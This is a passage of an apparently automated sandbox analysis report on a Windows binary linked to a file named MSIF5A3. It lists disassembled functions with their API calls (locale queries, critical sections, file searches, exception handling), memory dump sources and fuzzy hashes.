                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                              • Opcode ID: c5cc3f9b3141b6fcdab7eb672ec455554d6658dc37a605e09cc5f07adfabb29b
                                                                                                                                                                                                                              • Instruction ID: 638a952dcadbf0b2c33dd317bc70d748f634208acee441c6715a59539c8adfb7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5cc3f9b3141b6fcdab7eb672ec455554d6658dc37a605e09cc5f07adfabb29b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8D22B72E086298FDB65CF28DD407EAB7B6EB44305F1845EAD80DE7241D774AE818F41
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,0061E8D1,00000002,00000000,?,?,?,0061E8D1,?,00000000), ref: 0061E64C
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,0061E8D1,00000002,00000000,?,?,?,0061E8D1,?,00000000), ref: 0061E675
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,0061E8D1,?,00000000), ref: 0061E68A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 9dfb875026532fa6393dd40cea791d72784255db8b665a68ec8d1360408b6deb
                                                                                                                                                                                                                              • Instruction ID: f1fc372cb19a9ab893a06f03e931d42b5f7403d41eb178f71c3e752199f8c499
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dfb875026532fa6393dd40cea791d72784255db8b665a68ec8d1360408b6deb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2213A72A40211AADB34CF14C905ADB77A7AF64F64B9E8464ED0AD7210E733DDC1D790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E9CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _swprintf$FreeLocal
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2429749586-0
                                                                                                                                                                                                                              • Opcode ID: 33f9b20bcbac033d4bf690404fb08758477daa88ad5b854223ca831150c6297c
                                                                                                                                                                                                                              • Instruction ID: 31dd628430075986cc25f557e263996b9d364aaa3dd8203576d1881e8b247077
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33f9b20bcbac033d4bf690404fb08758477daa88ad5b854223ca831150c6297c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8F1DE71E00259AFDF19DFA9DC44BAEBBB9FF48300F104229F951AB281D735A941CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0061E894
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0061E8DD
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0061E8EC
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0061E934
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0061E953
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                                                                              • Opcode ID: 1e804806753d93e46a5f3272bf11c03cc342a359dd6bc5c7e0d9b74f84d59df1
                                                                                                                                                                                                                              • Instruction ID: a36f01d64a35dbc600787e4acbabaf1d794725246040bf447217b2b0070de821
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e804806753d93e46a5f3272bf11c03cc342a359dd6bc5c7e0d9b74f84d59df1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C518171A00216AFEB60DFA5CC45AFEB3BAAF58700F1C4469ED10E7290D772D981CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E2310 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00602C98: EnterCriticalSection.KERNEL32(0063DD3C,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602CA3
                                                                                                                                                                                                                                • Part of subcall function 00602C98: LeaveCriticalSection.KERNEL32(0063DD3C,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602CE0
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32 ref: 005E2365
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: EnterCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C58
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: LeaveCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C8B
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: RtlWakeAllConditionVariable.NTDLL ref: 00602D02
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                                                                              • String ID: <c$Xc$\Lc$pLc
                                                                                                                                                                                                                              • API String ID: 325507722-2710206493
                                                                                                                                                                                                                              • Opcode ID: 0f883361f53067defb673f280543a282d7e997fe554c303390b4a8239b162d83
                                                                                                                                                                                                                              • Instruction ID: a3e9dab4f5a694119c989d9050aa7aa3905fb3dd5389261249f382792427374e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f883361f53067defb673f280543a282d7e997fe554c303390b4a8239b162d83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF219AB0A416419FE350CF58EC1BB897BB2FB26320F002659E425972E0D77658048FF2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00615D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                              • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                              • Instruction ID: fb9bafaa34db9f415fefd3111cbec7b5c197dc65baea59200a460f23106cd73c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2B14A72D04655DFDB15CF28C881BEEFBA7EF99304F188169E405AB341D2349D82CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061B02D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0061B0C8
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0061B143
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0061B165
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0061B188
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1164774033-0
                                                                                                                                                                                                                              • Opcode ID: c9c161b15d9132620e974bb8c8c6b47beccdf98d6b9ca753c610e23912854462
                                                                                                                                                                                                                              • Instruction ID: 6e296d97390dc309456759a9fe562df40bfff0137ae7c3614dea7dc042be36cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9c161b15d9132620e974bb8c8c6b47beccdf98d6b9ca753c610e23912854462
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6841D671900619AEDF20DFA8CC99EEBB7BAEF89305F085199E405D7240E7709EC48B64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006033A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006033B4
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00603480
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006034A0
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 006034AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                              • Opcode ID: 8e3a47b1be83cc25a7a8c79a0e38b779dcebc91add8856ffe8cf3266f2472ce3
                                                                                                                                                                                                                              • Instruction ID: 0ab59b92d5410230b192773cbdfa652c94ed2045582c7506a32e1506d83ae53b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e3a47b1be83cc25a7a8c79a0e38b779dcebc91add8856ffe8cf3266f2472ce3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22314B75D45218DBDB21DF60D989BCDBBB8AF04305F10409AE50DAB290EB719B858F44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ED0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 005EC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,FAB1B776,?,00623D30,000000FF), ref: 005EC657
                                                                                                                                                                                                                                • Part of subcall function 005EC630: GetLastError.KERNEL32(?,00000000,00000000,FAB1B776,?,00623D30,000000FF), ref: 005EC661
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,00638AF0), ref: 005ED0D8
                                                                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00638AF0), ref: 005ED0E7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005ED0E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                              • API String ID: 3511171328-631824599
                                                                                                                                                                                                                              • Opcode ID: 3dd27fac1b1a3cc7ba7e1cdac553599300be936b86db0cc3a767184a10b60fff
                                                                                                                                                                                                                              • Instruction ID: aa7db1b3ebf7bec5d219ddf81ddf6876257895f3d1adb320dfcdc5c364772757
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd27fac1b1a3cc7ba7e1cdac553599300be936b86db0cc3a767184a10b60fff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36E06570104B918FD3349F29E40DB427EE1BF11700F04585CE495C6280E7B1D5498BB1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0061E28B
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0061E2D5
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0061E39B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 661929714-0
                                                                                                                                                                                                                              • Opcode ID: 977d929dcbc6705a89b11069de5eb8b1bda96f8b807983546353acf8e4608dff
                                                                                                                                                                                                                              • Instruction ID: c9cb4607502fd7d23f153a2313762b38f026e61cc95658047e4a54c5ad25a690
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 977d929dcbc6705a89b11069de5eb8b1bda96f8b807983546353acf8e4608dff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D56180719406079BEB289F24CC82BEAB7AAFF18300F1841B9ED15C7285E776D9C5CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00606E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00606F13
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00606F1D
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 00606F2A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: d85dc1e1698486cdf0bee2cde1ae036197f742ee1b4d7263f1f916a712cf5a4b
                                                                                                                                                                                                                              • Instruction ID: 209283e7156ff7112b18854ec81098f0b26e549fb492035a75c802bcc978c945
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d85dc1e1698486cdf0bee2cde1ae036197f742ee1b4d7263f1f916a712cf5a4b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 223106B49412289BCB25DF64DD89BCDBBB9BF08310F5041EAE50CA7290E7709F818F44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E45B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,FAB1B776,00000001,00000000,?,00000000,00624460,000000FF,?,005E474D,005E3778,?,00000000,00000000,?), ref: 005E45DB
                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00000000,00624460,000000FF,?,005E474D,005E3778,?,00000000,00000000,?,?,?,?,005E3778), ref: 005E45E6
                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00624460,000000FF,?,005E474D,005E3778,?,00000000,00000000,?,?,?), ref: 005E45F4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2853612939-0
                                                                                                                                                                                                                              • Opcode ID: 7869fe025e3f417e40d8e853abba3a55679d771b50a0e1ec6022cfe70d360d9e
                                                                                                                                                                                                                              • Instruction ID: 464d9f942d4c737394cce81e97eeed02d3b87b81440a6f5988fcb42f27b91250
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7869fe025e3f417e40d8e853abba3a55679d771b50a0e1ec6022cfe70d360d9e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3911C672A046959BC7398F5AEC45F66BBFCF785729F00052AEC5AD3240EB35AC048A90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E111 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0061E237,00000001,00000000,?,-00000050,?,0061E868,00000000,?,?,?,00000055,?), ref: 0061E183
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
